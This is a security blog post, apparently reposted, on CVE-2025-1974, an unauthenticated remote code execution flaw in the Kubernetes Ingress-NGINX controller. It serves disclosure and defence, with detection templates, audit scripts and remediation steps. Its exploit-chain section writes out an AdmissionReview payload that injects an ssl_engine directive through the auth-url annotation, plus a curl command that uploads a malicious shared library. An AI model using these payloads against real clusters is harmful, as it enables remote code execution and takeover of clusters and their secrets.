IngressNightmare: Ingress-NGINX Unauthenticated RCE (CVE-2025-1974)

admin, 27 March 2025 19:22:51


Vulnerability overview

CVE-2025-1974 is a high-severity vulnerability in the Kubernetes Ingress-NGINX Controller that lets an attacker achieve remote code execution (RCE) without authentication. It was discovered by the Wiz research team (Nir Ohfeld and others) at the end of 2024 and publicly disclosed in March 2025; it is one of the "IngressNightmare" series of vulnerabilities.

Technical background

Role of the Ingress-NGINX Controller

The Ingress-NGINX Controller is one of the core projects of the Kubernetes ecosystem, with 18.1k+ stars on GitHub. Its main roles are:

  • Acting as the cluster's traffic entry gateway, implementing the routing rules defined by Ingress resources

  • Providing reverse proxying and load balancing through NGINX

How the Ingress-NGINX Controller works

A Kubernetes Ingress controller manages external access to the cluster but does not perform the routing itself. The Ingress-NGINX Controller uses NGINX to implement Ingress rules, acts as the Ingress controller, and is the Ingress controller recommended in the Kubernetes documentation.

graph TD
    A[Ingress resource created/updated] --> B[Admission controller validation]
    B --> C{Is the configuration valid?}
    C -->|valid| D[Apply configuration]
    C -->|invalid| E[Reject request]

Vulnerability technical details

Root cause

The vulnerability lies in the configuration validation stage of the Ingress-NGINX Controller:

  1. While processing an Ingress object, the controller builds an NGINX configuration

  2. It validates that configuration with the nginx -t command

  3. Key defect: annotation values such as auth-url are not sufficiently filtered before being placed in the configuration

Exploit chain analysis

1. Find vulnerable clusters

kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx

2. Configuration injection

The attacker crafts a special AdmissionReview request containing an Ingress object with a malicious auth-url annotation, for example:

{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "request": {
    "uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a5",
    "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
    "resource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
    "requestKind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
    "requestResource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
    "name": "test-ingressxaa",
    "namespace": "default",
    "operation": "CREATE",
    "userInfo": {},
    "object": {
      "kind": "Ingress",
      "apiVersion": "networking.k8s.io/v1",
      "metadata": {
        "name": "test-ingressxaa",
        "namespace": "default",
        "creationTimestamp": null,
        ### key location ###
        "annotations": {
          "nginx.ingress.kubernetes.io/rewrite-target": "/",
          "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;}}}\nssl_engine /path/to/shared-library.so;\nevents {\nserver { location /aa { #"
        }
      },
      "spec": {
        "ingressClassName": "nginx",
        "rules": [
          {"host": "test.local", "http": {"paths": []}}
        ]
      },
      "status": {"loadBalancer": {}}
    },
    "oldObject": null,
    "dryRun": true,
    "options": {"kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1"}
  }
}

3. Malicious library upload: NGINX's client body buffering is used to write the malicious .so file to disk:

curl -X POST http://ingress-nginx/data -T evil.so

4. Code execution: the ssl_engine directive loads the malicious shared library, triggering RCE

Affected versions

ingress-nginx versions:

  • < v1.11.0

  • v1.11.0 - 1.11.4

  • v1.12.0

Detection

External detection (Nuclei template)

id: CVE-2025-1974

info:
  name: Ingress-Nginx Controller - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller
  impact: |
    Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
  remediation: |
    Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
  reference:
    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
    - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1974
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-653
    cve-id: CVE-2025-1974
  metadata:
    verified: true
    max-request: 1
    shodan-query: ssl:"ingress-nginx" port:8443
  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "kind": "AdmissionReview",
          "apiVersion": "admission.k8s.io/v1",
          "request": {
            "uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a6",
            "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
            "resource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
            "requestKind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
            "requestResource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
            "name": "test-{{randstr}}",
            "namespace": "default",
            "operation": "CREATE",
            "userInfo": {},
            "object": {
              "kind": "Ingress",
              "apiVersion": "networking.k8s.io/v1",
              "metadata": {
                "name": "test-{{randstr}}",
                "namespace": "default",
                "creationTimestamp": null,
                "annotations": {
                  "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"
                }
              },
              "spec": {
                "ingressClassName": "nginx",
                "rules": [
                  {"host": "{{randstr}}", "http": {"paths": []}}
                ]
              },
              "status": {"loadBalancer": {}}
            },
            "oldObject": null,
            "dryRun": true,
            "options": {"kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1"}
          }
        }

    matchers:
      - type: word
        part: body
        words:
          - 'AdmissionReview'
          - 'directive is not allowed here'
          - 'load_module'
        condition: and

Run the template

nuclei -t CVE-2025-1974.yaml -u https://target:8443

In-cluster detection

kubectl get pods -n ingress-nginx -l app.kubernetes.io/component=controller -o json | jq '.items[].spec.containers[] | select(.name=="controller") | .image'

Version check logic

id: CVE-2025-1974-k8s

info:
  name: Ingress-Nginx Controller - Unauthenticated Remote Code Execution
  author: princechaddha
  severity: critical
  description: A security issue was discovered in ingress-nginx where some Ingress annotations can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller
  impact: |
    Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
  remediation: |
    Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
  reference:
    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
    -
  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,k8s-cluster-security

flow: |
  code(1);
  for (let pod of template.items) {
    set("pod", pod);
    javascript(1);
  }

self-contained: true

code:
  - engine:
      - sh
      - bash
    source: kubectl get pods -n ingress-nginx -l app.kubernetes.io/component=controller -o json

    extractors:
      - type: json
        name: items
        internal: true
        json:
          - '.items[]'

javascript:
  - code: |
      let podData = JSON.parse(template.pod);
      const container = podData.spec.containers.find(c => c.name === 'controller');
      if (container && container.image) {
        const imageTag = container.image.split(':')[1];
        if (imageTag) {
          const version = imageTag.split('@')[0].replace(/^v/, '');
          const [major, minor, patch] = version.split('.').map(v => parseInt(v, 10));
          if ((major === 1 && minor === 11 && patch < 5) ||
              (major === 1 && minor === 12 && patch === 0) ||
              (major === 1 && minor < 11) ||
              (major === 1 && minor === 9 && patch <= 3)) {
            let result = (`Ingress-Nginx controller in namespace '${podData.metadata.namespace}' is running vulnerable version ${version}. Update to v1.12.1+ or v1.11.5+`);
            Export(result);
          }
        }
      }

    extractors:
      - type: dsl
        dsl:
          - response
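The template above derives the version with `image.split(':')[1]`, which breaks on a registry that carries a port (`registry.internal:5000/...`) and has to strip a digest afterwards. The following is an added example, not part of the original post or of the Nuclei project: an offline Python check that reads the same `kubectl get pods -n ingress-nginx -o json` output, parses the tag robustly, and applies the affected ranges the page lists (< v1.11.0, v1.11.0 - v1.11.4, v1.12.0). The pod list embedded in it is constructed sample data, and the registry host and pod names are placeholders.

```python
"""Added example (not from the original post): offline version check for the
Ingress-NGINX controller, applied to `kubectl get pods -n ingress-nginx -o json` output.

Unlike `image.split(':')[1]`, parse_image_tag() handles registries with a port
("registry.internal:5000/...") and image digests ("...:v1.11.4@sha256:...").
The affected ranges are the ones the page lists: < v1.11.0, v1.11.0 - v1.11.4, v1.12.0.
"""
import json
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# Constructed sample shaped like `kubectl get pods -n ingress-nginx -o json` (not real cluster data).
SAMPLE_PODS_JSON = json.dumps({
    "items": [
        {"metadata": {"name": "ingress-nginx-controller-aaa", "namespace": "ingress-nginx"},
         "spec": {"containers": [{
             "name": "controller",
             "image": "registry.k8s.io/ingress-nginx/controller:v1.11.4@sha256:" + "0" * 64}]}},
        {"metadata": {"name": "ingress-nginx-controller-bbb", "namespace": "ingress-nginx"},
         "spec": {"containers": [{
             "name": "controller",
             "image": "registry.internal:5000/ingress-nginx/controller:v1.12.1"}]}},
        {"metadata": {"name": "ingress-nginx-controller-ccc", "namespace": "ingress-nginx"},
         "spec": {"containers": [{
             "name": "controller",
             "image": "registry.k8s.io/ingress-nginx/controller:v1.12.0"}]}},
    ]
})


def parse_image_tag(image: str) -> Optional[str]:
    """Return the tag of an image reference, or None if it is digest-only or untagged."""
    ref = image.split("@", 1)[0]            # drop "@sha256:..." digest
    name = ref.rsplit("/", 1)[-1]           # last path component, e.g. "controller:v1.11.4"
    if ":" not in name:                     # a ':' before the last '/' is a registry port, not a tag
        return None
    return name.rsplit(":", 1)[1]


def parse_version(tag: str) -> Optional[Version]:
    """Turn 'v1.11.4' into (1, 11, 4); non-semver tags such as 'latest' give None."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", tag)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable_version(version: Version) -> bool:
    """Affected ranges as listed on the page: < 1.11.0, 1.11.0-1.11.4, and exactly 1.12.0."""
    if version < (1, 11, 0):
        return True
    if (1, 11, 0) <= version <= (1, 11, 4):
        return True
    return version == (1, 12, 0)


def find_vulnerable_controllers(pods_json: str) -> List[dict]:
    """Report controller containers whose tag is affected, or whose tag cannot be parsed."""
    findings = []
    for pod in json.loads(pods_json).get("items", []):
        meta = pod.get("metadata", {})
        for c in pod.get("spec", {}).get("containers", []):
            if c.get("name") != "controller":
                continue
            image = c.get("image", "")
            tag = parse_image_tag(image)
            version = parse_version(tag) if tag else None
            if version is None:
                # Do not assume an unparseable tag (e.g. "latest" or digest-only) is safe.
                findings.append({"namespace": meta.get("namespace"), "pod": meta.get("name"),
                                 "image": image, "status": "unknown"})
            elif is_vulnerable_version(version):
                findings.append({"namespace": meta.get("namespace"), "pod": meta.get("name"),
                                 "image": image, "status": "vulnerable",
                                 "version": ".".join(map(str, version))})
    return findings


if __name__ == "__main__":
    for f in find_vulnerable_controllers(SAMPLE_PODS_JSON):
        print(f)
```

To run it against a real cluster, replace SAMPLE_PODS_JSON with the output of the kubectl command from the in-cluster detection step. Tags that are not plain semver (for example "latest" or a digest-only reference) are reported as "unknown" rather than silently treated as patched.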

Remediation

Immediate measures

1. Upgrade to a fixed version
kubectl set image deployment/ingress-nginx-controller -n ingress-nginx controller=k8s.gcr.io/ingress-nginx/controller:v1.12.1
2. Network isolation
# NetworkPolicy example: only allow the admission webhook port (8443) to be reached
# from the control plane, while keeping the data-plane listener ports open.
# Note: on managed clusters (EKS, GKE, AKS) the API server is not a pod in kube-system;
# replace the namespaceSelector with an ipBlock covering the control-plane address.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-admission
  namespace: ingress-nginx
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/component: controller
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
    ports:
    - protocol: TCP
      port: 8443
  # Without this rule the policy would also block ordinary HTTP/HTTPS traffic to the
  # controller, because once any ingress rule is present all unlisted traffic is denied.
  - ports:
    - protocol: TCP
      port: 80
    - protocol: TCP
      port: 443

Long-term hardening

  • Enable mTLS authentication for the admission controller

  • Regularly audit how Ingress annotations are used

  • Enforce Pod security policies that restrict mounting of sensitive directories
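The audit of Ingress annotations recommended above follows directly from the root cause: annotation values such as auth-url are placed into nginx.conf without sufficient filtering. The script below is an added example, not part of the original post or of the ingress-nginx project. It reads `kubectl get ingress -A -o json` output and flags any nginx.ingress.kubernetes.io/* annotation whose value contains characters that carry meaning inside an NGINX configuration (semicolon, braces, `#`, newline), since a legitimate URL or CN value never needs them. The Ingress list embedded in it is constructed sample data; the second object reuses the probe string from the page's Nuclei template, and the namespaces and names are placeholders.

```python
"""Added example (not from the original post): audit Ingress annotations for NGINX
configuration metacharacters, using `kubectl get ingress -A -o json` output.

CVE-2025-1974 exists because annotation values such as auth-url are pasted into
nginx.conf without sufficient filtering. A value that can close a directive or block
(';', '{', '}', '#', newline) is exactly what a legitimate URL-valued annotation never
needs, so any such value is worth a look.
"""
import json
import re
from typing import Dict, List, Tuple

NGINX_ANNOTATION_PREFIX = "nginx.ingress.kubernetes.io/"
# Characters that have meaning inside nginx.conf; none is needed in a URL or CN value.
CONFIG_METACHARS = re.compile(r"[;{}#\r\n]")

# Constructed sample shaped like `kubectl get ingress -A -o json` (not real cluster data).
# The second object reuses the probe string from the page's Nuclei template.
SAMPLE_INGRESSES_JSON = json.dumps({
    "items": [
        {"metadata": {"name": "shop", "namespace": "prod", "annotations": {
            "nginx.ingress.kubernetes.io/auth-url": "https://auth.prod.svc.cluster.local/verify",
            "nginx.ingress.kubernetes.io/rewrite-target": "/"}}},
        {"metadata": {"name": "test-ingressxaa", "namespace": "default", "annotations": {
            "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"}}},
        {"metadata": {"name": "plain", "namespace": "default"}},
    ]
})


def suspicious_annotations(ingress: dict) -> List[Tuple[str, str]]:
    """Return (key, value) pairs of nginx.ingress.kubernetes.io/* annotations that contain metacharacters."""
    annotations = ingress.get("metadata", {}).get("annotations") or {}
    hits = []
    for key, value in annotations.items():
        if key.startswith(NGINX_ANNOTATION_PREFIX) and CONFIG_METACHARS.search(str(value)):
            hits.append((key, value))
    return hits


def audit_ingresses(ingresses_json: str) -> List[Dict]:
    """Walk every Ingress in the list and collect those with suspicious annotation values."""
    findings = []
    for ing in json.loads(ingresses_json).get("items", []):
        hits = suspicious_annotations(ing)
        if hits:
            meta = ing.get("metadata", {})
            findings.append({"namespace": meta.get("namespace"), "name": meta.get("name"),
                             "annotations": hits})
    return findings


if __name__ == "__main__":
    for f in audit_ingresses(SAMPLE_INGRESSES_JSON):
        for key, value in f["annotations"]:
            print(f"{f['namespace']}/{f['name']}: {key} = {value!r}")
```

For a real cluster, save `kubectl get ingress -A -o json` to a file and pass its contents to audit_ingresses(). The check covers every nginx.ingress.kubernetes.io/* annotation rather than auth-url alone, because the Nuclei template on this page names auth-tls-match-cn as another injection point; a hit is a review item, not proof of compromise.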

Timeline

Date        Event
2024-12-31  Wiz reports the vulnerability to the Kubernetes security team
2025-03-24  Public disclosure; patched versions released
2025-03-25  In-cluster detection template released
2025-03-26  External detection template released

Summary

The exploit chain for this vulnerability is complete: an attacker can craft a malicious Ingress object to escape the container and ultimately take control of the entire cluster. All Ingress-NGINX users are advised to check for the vulnerability and upgrade immediately.


Originally published on the WeChat public account SecLink安全空间: IngressNightmare: Ingress-NGINX Unauthenticated RCE (CVE-2025-1974)

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site bears no legal or joint liability. Questions may be sent by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
Please keep this link when reposting (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/3890769.html
